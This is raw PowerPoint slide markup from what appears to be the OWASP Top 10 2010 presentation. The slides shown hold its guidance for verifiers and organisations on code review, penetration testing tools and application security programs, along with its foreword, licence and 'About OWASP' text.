          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s Next for Verifiers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+V</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4724401"/>
          <a:ext cx="3429000" cy="4419599"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="308923">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Code Review</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1"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84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2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Reviewing the code is the strongest way to verify whether an application is secure. Testing </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>can only prove that an application is insecure.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Reviewing the Code: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>As a companion to the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Developer’s Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, OWASP has produced the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Code Review Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> to help developers and application security specialists understand how to efficiently and effectively review a web application for security by reviewing the code. There are numerous web application security issues, such as Injection Flaws, that are far easier to find through code review, than external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Code Review Tools: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP has been doing some promising work in the area of assisting experts in performing code analysis, but these tools are still in their early stages. The authors of these tools use them every day when performing their security code reviews, but non-experts may find these tools a bit difficult to use. These include </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CodeCrawler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Orizon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>O2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3505200" y="4724400"/>
          <a:ext cx="3352800" cy="4419600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="344996">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Security and Penetration Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1"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6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Testing the Application: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP produced the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> to help developers, testers, and application security specialists understand how to efficiently and effectively test the security of web applications. This enormous guide, which had dozens of contributors, provides wide coverage on many web application security testing topics. Just as code review has its strengths, so does security testing. It’s very compelling when you can prove that an application is insecure by demonstrating the exploit. There are also many security issues, particularly all the security provided by the application infrastructure, that simply cannot be seen by a code review, since the application is not providing the security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Application Penetration Testing Tools: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>WebScarab</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, which is one of the most widely used of all OWASP projects, is a web application testing proxy. It allows a security analyst to intercept web application requests, so the analyst can figure out how the application works, and then allows the analyst to submit test requests to see if the application responds securely to such requests. This tool is particularly effective at assisting an analyst in identifying XSS flaws, Authentication flaws, and Access Control flaws.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1143001"/>
          <a:ext cx="6858000" cy="8000999"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="304799">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> Your Application </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Security Program Now</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1"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Application security is no longer a choice. Between increasing attacks and regulatory pressures, organizations must establish an effective capability for securing their applications. Given the staggering number of applications and lines of code already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.   OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio.  Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization’s application security posture.  It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner.  Some of the key activities in effective application security programs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tle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s Next for Organizations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2990125"/>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OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="1143000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="354169">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Copyright and License</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt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Copyright © 2003 – 2010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This document is released under the Creative Commons Attribution </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ShareAlike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> 3.0 license. For any reuse or distribution, you must make clear to others the license terms of this work.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1371600"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9" name="Picture 2">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8517890"/>
            <a:ext cx="1046163" cy="374650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1144987"/>
          <a:ext cx="3352800" cy="6768406"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="393881">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Foreword</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="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6374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Insecure software is already undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our digital infrastructure gets increasingly complex and interconnected, the difficulty of achieving application security increases exponentially. We can no longer afford to tolerate relatively simple security problems like those presented in the OWASP Top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The goal of the Top 10 project is to raise </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>awareness</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>many more</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>This release of the OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Top 10 marks this project’s eighth year of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, minor updates were made in 2004 and 2007, and this is the 2010 release.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We encourage you to use the Top 10 to get your organization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>started</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> with application security. Developers can learn from the mistakes of other organizations. Executives should start thinking about how to manage the risk that software applications create in their enterprise.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1F497D"/>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But the Top 10 is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>not</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> an application security program. Going forward, OWASP recommends that organizations establish a strong foundation of training, standards, and tools that makes secure coding possible. On top of that foundation, organizations should integrate security into their development, verification, and maintenance processes. Management can use the data generated by these activities to manage cost and risk associated with application security.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We hope that the OWASP Top 10 is useful to your application security efforts. Please don’t hesitate to contact OWASP with your questions, comments, and ideas, either publicly to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP-TopTen@lists.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> or privately to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id=""/>
                        </a:rPr>
                        <a:t>dave.wichers@owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>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hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>http://www.owasp.org/index.php/Top_10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="1143000"/>
          <a:ext cx="3429000" cy="6772378"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="390732">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>About OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="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63816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The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted.  At OWASP you’ll find</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>free and open </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a: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Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> security tools and standards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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Complete books on application security testing, secure code development, and security code review</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Standard security controls and libraries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Local</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> chapters worldwide</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Cutting edge research</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Extensive conferences worldwide</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Mailing lists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solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>And</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> more … all at </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in all of these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Similar to many open-source software projects, OWASP produces many types of materials in a collaborative, open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The OWASP Foundation is the non-profit entity that ensures the project’s long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Global Committees, Chapter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Leaders, Project Leaders, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>project members. We support innovative</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> security research with grants and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Come join us!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143000"/>
          <a:ext cx="6858000" cy="8001000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="304800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>It’s About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> Risks, Not Weaknesses</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1"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7665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Although </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>previous versions of the OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
